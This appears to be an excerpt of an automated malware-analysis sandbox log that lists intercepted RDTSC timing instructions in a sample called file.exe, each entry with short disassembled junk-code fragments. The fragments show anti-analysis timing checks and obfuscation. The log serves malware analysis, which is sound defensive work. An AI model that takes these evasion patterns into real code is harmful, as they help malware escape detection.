Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5DB13 second address: F5DB3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD501h 0x00000007 pushad 0x00000008 jmp 00007F4FB8FDD504h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5D4F6 second address: F5D4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5D4FA second address: F5D53F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F4FB8FDD4FDh 0x0000000e jmp 00007F4FB8FDD505h 0x00000013 pop edx 0x00000014 popad 0x00000015 push edx 0x00000016 jo 00007F4FB8FDD50Bh 0x0000001c jmp 00007F4FB8FDD4FFh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5D792 second address: F5D7A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F4FB8D6227Ch 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5D7A9 second address: F5D7AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5D7AE second address: F5D7E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4FB8D62276h 0x0000000a jmp 00007F4FB8D62280h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4FB8D6227Fh 0x0000001d jno 00007F4FB8D62276h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5D7E6 second address: F5D7EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5D7EA second address: F5D801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FB8D62281h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6BBC1 second address: F6BBC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B763 second address: F6B769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B918 second address: F6B92C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD500h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B92C second address: F6B94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F4FB8D6227Ch 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jng 00007F4FB8D62276h 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B94D second address: F6B95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4FB8FDD4F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F712AB second address: F712B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F712B1 second address: F712B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F712B5 second address: F712CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jc 00007F4FB8D62276h 0x0000000f pop ecx 0x00000010 pop esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F712CF second address: F712D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F712D3 second address: F712DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F76F4D second address: F76F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7EF88 second address: F7EF9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8D6227Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7EF9B second address: F7EFA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F80E27 second address: F80E65 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F4FB8D62289h 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F4FB8D6227Eh 0x00000016 jmp 00007F4FB8D6227Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F80E65 second address: F80E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jg 00007F4FB8FDD4F6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F80E71 second address: F80E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F80CCA second address: F80CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F84721 second address: F84727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F84727 second address: F84731 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4FB8FDD4F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F84731 second address: F84737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F84737 second address: F8475A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD509h 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F4FB8FDD4F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8475A second address: F8476D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8476D second address: F84779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8BB0E second address: F8BB14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8A6A0 second address: F8A6A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8A820 second address: F8A824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8A9B1 second address: F8AA04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4FB8FDD4F6h 0x0000000a push eax 0x0000000b jc 00007F4FB8FDD4F6h 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 popad 0x00000015 pushad 0x00000016 jns 00007F4FB8FDD510h 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F4FB8FDD4FCh 0x00000026 popad 0x00000027 jbe 00007F4FB8FDD4F8h 0x0000002d push ecx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8ACE9 second address: F8AD00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FB8D62283h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8AD00 second address: F8AD0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8AD0D second address: F8AD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F4FB8D62282h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9FB73 second address: E9FB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FA3A16 second address: FA3A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4FB8D62276h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB0CAE second address: FB0CB8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4FB8FDD4F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9D68 second address: FC9DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FB8D62288h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F4FB8D62284h 0x00000010 jno 00007F4FB8D62276h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4FB8D62288h 0x00000021 pushad 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 jg 00007F4FB8D62276h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9DC9 second address: FC9DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9DCE second address: FC9DEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4FB8D62285h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCA5CB second address: FCA5EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jl 00007F4FB8FDD510h 0x0000000d jmp 00007F4FB8FDD504h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCA96F second address: FCA979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCA979 second address: FCA97E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCA97E second address: FCA983 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCA983 second address: FCA989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCD945 second address: FCD949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCD949 second address: FCD952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC00DA second address: 4CC0138 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62281h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4FB8D6227Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov si, di 0x00000014 push eax 0x00000015 push edx 0x00000016 pushfd 0x00000017 jmp 00007F4FB8D62283h 0x0000001c adc ax, 277Eh 0x00000021 jmp 00007F4FB8D62289h 0x00000026 popfd 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0138 second address: 4CC0166 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD500h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F4FB8FDD500h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0166 second address: 4CC016C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC016C second address: 4CC01A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 movzx ecx, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F4FB8FDD505h 0x00000016 sub ch, 00000076h 0x00000019 jmp 00007F4FB8FDD501h 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0F03 second address: 4CA0F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0F07 second address: 4CA0F23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD508h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0F23 second address: 4CA0F52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F4FB8D62280h 0x00000015 sbb ch, FFFFFF98h 0x00000018 jmp 00007F4FB8D6227Bh 0x0000001d popfd 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0F52 second address: 4CA0F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov al, FCh 0x00000008 popad 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4FB8FDD509h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0F7B second address: 4CA0F81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0F81 second address: 4CA0F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0F87 second address: 4CA0FAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62286h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov edi, 45A5681Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0FAD second address: 4CA0FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebp 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4FB8FDD507h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0E9F second address: 4CE0EA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0EA5 second address: 4CE0EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0EA9 second address: 4CE0EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0EAD second address: 4CE0EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4FB8FDD506h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 call 00007F4FB8FDD4FCh 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C800F3 second address: 4C80142 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop esi 0x00000011 pushfd 0x00000012 jmp 00007F4FB8D62287h 0x00000017 and cx, 8C5Eh 0x0000001c jmp 00007F4FB8D62289h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80142 second address: 4C80152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8FDD4FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80152 second address: 4C80156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80156 second address: 4C8017F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F4FB8FDD508h 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C8017F second address: 4C80190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8D6227Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80190 second address: 4C80194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80194 second address: 4C801F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b jmp 00007F4FB8D6227Dh 0x00000010 push dword ptr [ebp+0Ch] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F4FB8D6227Ch 0x0000001a add eax, 1E741448h 0x00000020 jmp 00007F4FB8D6227Bh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 pushfd 0x00000029 jmp 00007F4FB8D62286h 0x0000002e add ah, FFFFFFA8h 0x00000031 jmp 00007F4FB8D6227Bh 0x00000036 popfd 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C801F7 second address: 4C80234 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4FB8FDD508h 0x00000008 jmp 00007F4FB8FDD505h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80234 second address: 4C80238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80238 second address: 4C8023C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C8023C second address: 4C80242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80277 second address: 4C802A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 pushfd 0x00000006 jmp 00007F4FB8FDD4FBh 0x0000000b jmp 00007F4FB8FDD503h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C802A6 second address: 4C802AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C802AA second address: 4C802AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C802AE second address: 4C802B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C802B4 second address: 4C802BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C802BA second address: 4C802BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0CBA second address: 4CA0CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0CBF second address: 4CA0CD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, edi 0x0000000f mov bx, CCB2h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0CD9 second address: 4CA0D16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4FB8FDD506h 0x00000009 or ecx, 13CF9DC8h 0x0000000f jmp 00007F4FB8FDD4FBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F4FB8FDD4FBh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0D16 second address: 4CA0D1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0D1C second address: 4CA0D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0D20 second address: 4CA0D46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4FB8D62289h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0D46 second address: 4CA0D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0D4A second address: 4CA0D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
